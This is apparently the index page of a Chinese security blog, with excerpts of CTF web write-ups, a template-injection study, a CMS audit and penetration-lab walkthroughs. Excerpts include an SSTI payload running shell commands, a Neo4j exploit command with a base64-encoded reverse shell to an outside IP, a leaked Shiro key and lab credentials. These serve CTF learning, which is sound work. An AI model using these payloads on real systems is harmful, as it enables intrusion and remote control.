avatar
Articles
79
Tags
0
Categories
0

首页/Home
时间线/Footprints
朋友们/Link
关于/About
A day in AsaL1n
首页/Home
时间线/Footprints
朋友们/Link
关于/About

A day in AsaL1n

2024 巅峰极客初赛 web 部分wp
Created2024-08-18
2024 巅峰极客初赛 web 感谢A1natas的小伙伴 这次我们A1natas 获得了第19名 决赛见 EncirclingGame签到 直接玩游戏就行 队友玩了会就穿了 GoldenHornKing贴一下payload 1lipsum.__globals__['__builtins__']['eval']("app.add_api_route('/shell',lambda:result ,methods=['GET'])",{'app':app,'result':lipsum.__globals__.get("os").popen("cat /flag").read()}) 源代码如下 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515 ...
beetl 模板注入学习
Created2024-08-12
beetl 模板注入学习依赖测试使用的依赖 12345678910<dependency> <groupId>com.ibeetl</groupId> <artifactId>beetl</artifactId> <version>3.0.11.RELEASE</version></dependency><dependency> <groupId>org.antlr</groupId> <artifactId>antlr4-runtime</artifactId> <version>4.7.2</version>//需要的引擎</dependency> 语法 主要还是参考官方文档 Beetl: Beetl3.0,模板引擎。从2010年开始研发开源 (gitee.com) 注意到这个 任意方法调用写一个demo看看是怎么阻止恶意方法调用的 12345678 ...
Prain清雨博客v1.3.0审计
Created2024-08-07
Prain清雨博客v1.3.0审计 某比赛里面出现的一道题目 赛时都花时间在做渗透上面了 今天抽出点时间来看看 路由 这个是一个极度轻量化的博客框架 所有的路由控制都在index.php这一个文件里面 首先调用他定义的get方法 这里我们访问的是/目录 为空 默认为index 使用$_SERVER[‘REQUEST_URI’]获取访问的路由 一系列的匹配之后 返回了XDEBUG_SESSION_START=18778这个值 后面就是一系列包含文件 检验安装的操作 然后进到switch里面 查询是否有匹配的路由 存在则反感会页面 否则返还404 比如index 访问/?index 这里显然不存在这个文件 返回空 后台插件rce漏洞该漏洞需要登录 漏洞点出现在?import路由 这个是一个上传主题的地方 这个博客允许上传自定义主题 123456789101112131415if(pathinfo($_FILES['file']['name'], PATHINFO_EXTENSION) == 's ...
2024 n00bzctf web wp
Created2024-08-04
2024 n00bzctf web wp 最近回到家里 煞笔浙江40多度 不想出门 看了好几天春秋杯的那个mycms 没啥思路 想摆了(划掉) 逛网站 在CTF赛事中心 - Bugku CTF 发现了这个比赛 上来玩玩 题目不是很难 一个小时就ak了。。。水点博客 Passwordless代码 1234567891011121314151617181920212223242526272829303132#!/usr/bin/env python3from flask import Flask, request, redirect, render_template, render_template_stringimport subprocessimport urllibimport uuidglobal leetapp = Flask(__name__)flag = open('/flag.txt').read()leet=uuid.UUID('13371337-1337-1337-1337-133713371337')@app.rou ...
从ciscn2024 sanic和DASCTF2024 Sanic's revenge 学sanic原型链污染
Created2024-07-27
从ciscn2024 sanic和DASCTF2024 Sanic’s revenge 学sanic原型链污染 四川回来 给机房带来了久违的流感 ciscn2024 sanic访问/src给出源码 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354from sanic import Sanicfrom sanic.response import text, htmlfrom sanic_session import Sessionimport pydash# pydash==5.1.2class Pollute: def __init__(self): passapp = Sanic(__name__)app.static("/static/", "./static/")Session(app)@app.route('/', methods=[&# ...
2024 ciscn 决赛 记录+部分wp
Created2024-07-23
2024 ciscn 决赛 记录+部分wp 第一次国赛决赛 还是很激动的一次比赛 感谢A1natas的小伙伴给予我的帮助 最后混了一个二等奖 day0从杭州萧山飞到成都 四川话听起来还是巴适 这里我就不得不吐槽某一个队员的方言了 比赛举办在四川大学 酒吧舞就是不一样啊 学校看起来就是牛逼 场地在体育馆(怎么又是体育馆 想起来某一次比赛的经历了 说的就是华东南) 开了空调 这空调嘎嘎得劲 回去就吹感冒了 成都是真的不夜城 晚上11点了还是灯火通明 晚上吃了顿火锅(都来四川了不试试?)我草好辣(已老实求放过) 晚上才看到要配置相关可信计算的环境(主办方现在才发 也是厉害的)环境配置到凌晨两点多 第二天起来感觉要寄了 day1第一天是可信计算+awdp 做了点web 然后看边上的大哥对着计算无能狂怒 awdp 绝对是防守修复放在第一位的 防守check过了之后 每一次都可以继续得分 ezjs fix不许上传ejs文件 但是应该是可以存在rce的 直接加上一个对ejs文件的文件内部文件过滤 随便过滤点就成功修了 break攻击的话 有很多的思路 赛后发现可以是往 n ...
春秋云镜-ThermalPower
Created2024-07-14
春秋云镜-ThermalPower外网使用nmap扫描所给的web服务 访问8080 使用dirsearch扫描泄露文件 确定是heapdump泄露 下载泄露文件 分析得到shirokey 1algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES shiro attack一把梭 得到flag1 弹shell出来 搭建代理 走代理的扫描有点问题 还是上传之后扫描 172.22.17.6:21存在一个ftp服务 可以匿名登录 1proxychains ftp 172.22.17.6 连接很不稳定 直接使用浏览器访问 在SCADA 得到一个用户密码 123WIN-SCADA: 172.22.26.xxUsername: AdministratorPassword: IYnT3GyCiy3 fscan扫描 查看 注意到有一个内部员工通讯录和一个火创能源内部通知 注意到初始账号密码格式 scada工程师只有这些 也就是这些密码 12345678910chenhua/chenhua@0813zh ...
春秋云镜-Tsclient
Created2024-07-13
感觉已经国赛已经寄了 四川旅游计划 启动 春秋云镜-Tsclient外网先扫描端口 尝试爆破mssql的账号密码 得到密码为1qaz!QAZ 成功登录mssql 激活xpcmdshell 成功执行命令 msf生成shell 反弹到自己的vps上面来 使用msf自动提权 得到第一个flag 搭建隧道 把流量传出来 扫描内网 1234567891011121314151617181920212223[*] 172.22.8.31 XIAORANG\WIN19-CLIENT [*] 172.22.8.15 [+]DC XIAORANG\DC01 [*] WebTitle:http://172.22.8.18 code:200 len:703 title:IIS Windows ServerNetInfo:[*]172.22.8.18 [->]WIN-WEB [->]172.22.8.18 [->]2001:0:348b:fb58:3c9d:2e4a:d89d:b ...
春秋云镜-Time
Created2024-07-12
春秋云镜-Time外网 nmap扫描端口 只扫描出来22端口 令我很是疑惑 用goby进行信息收集 注意到开启了7474端口 直接访问 存在Neo4j shell 漏洞 CVE-2021-34371 脚本一把梭 1java -jar rhino_gadget-1.0-SNAPSHOT-fatjar.jar rmi://39.98.127.126:1337 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMjI5LjIwMi4xNjQvMzIzMiAwPiYx}|{base64,-d}|{bash,-i}" 成功反弹shell 在tmp目录下上传fscan 查看当前网段 12当前内网IP 172.22.6.36./fscan -h 177.22.6.36/16 >> out.txt 找到以下主机 123[*] 172.22.6.12 [+]DC XIAORANG\DC-PROGAME Windows Server 2 ...
春秋云镜-Initial
Created2024-07-11
我顶! 春秋云镜-Initial外网开始的时候给了一个ip 直接扫描端口 80端口 上去看看 注意到是title 明显是thinkphp 工具跑一下 发现存在ThinkPHP 5.0.23 RCE 一键getshell之后 蚁剑连接 上传linux-exploit-suggester 到tmp目录下 提权 可以看到sudo 提权 sudo -l 查看 mysql存在sudo权限 注意的是蚁剑的shell是模拟出来的shell 不能直接使用/bin/sh 提权 得到flag1 1flag{60b53231- 查看内网ip 上传 fscan 扫描内网 搭建代理 传递流量出来 172.22.1.18 弱密码admin/admin123 登录 网上翻找有没有payload 12345678910111213141516171819202122232425262728293031323334import requestssession = requests.session()url_pre = 'http://172.22 ...
1234…8
avatar
AsaL1n
Articles
79
Tags
0
Categories
0
Follow Me
Announcement
why we need that??
Recent Post
京麒ctf Fastj 学习2025-06-21
新版本 codeql 学习2025-06-16
2025 软件赛决赛 记录2025-05-20
2025 长城杯 final 记录2025-05-04
CVE-2025-24813 Tomcat session 反序列化分析2025-03-31
Archives
  • June 20252
  • May 20252
  • March 20253
  • February 20252
  • January 20251
  • December 20241
  • November 20242
  • October 20245
Info
Article :
79
UV :
PV :
Last Update :
©2020 - 2025 By AsaL1n
Framework Hexo|Theme Butterfly